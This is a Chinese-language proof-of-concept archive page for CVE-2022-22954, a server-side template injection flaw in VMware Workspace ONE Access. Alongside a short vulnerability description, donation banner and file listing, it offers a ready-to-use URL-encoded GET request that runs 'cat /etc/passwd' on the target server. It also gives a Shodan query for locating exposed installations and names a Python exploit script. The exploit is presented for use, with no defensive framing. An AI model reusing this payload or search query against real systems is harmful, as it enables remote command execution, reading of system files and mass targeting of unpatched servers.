目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%

CVE-2022-22954 PoC — VMware 多款产品代码注入漏洞

来源
关联漏洞
标题:VMware 多款产品代码注入漏洞 (CVE-2022-22954)
Description:Vmware Workspace One Access是美国Vmware公司的将用户身份与设备和网络信息等因素结合起来,为 Workspace One 交付的应用程序制定智能驱动的条件访问决策。 VMware 多款产品存在代码注入漏洞,该漏洞源于不正确的输入验证。远程攻击者利用该漏洞发送特制的HTTP请求并执行服务器端模板注入。
介绍
# VMware-CVE-2022-22954

# VMware CVE-2022-22954 Workspace ONE Access Freemarker 服务器端模板注入

POC for Vmware CVE-2022-22954

Use this one line GET request!! This will execute cat /etc/passwd

{host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d

Shodan Query: http.favicon.hash:-1250474341


## use python3 exp url
--- 

<img width="872" alt="image" src="https://user-images.githubusercontent.com/59011386/162896235-1142d323-76df-43ba-a784-6346e1b8bb3f.png">
文件快照

[4.0K] /data/pocs/89e1bb773583a8fd13b8aff830a7aa10adeba390 ├── [ 671] README.md └── [3.7K] VMware CVE-2022-22954.py 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。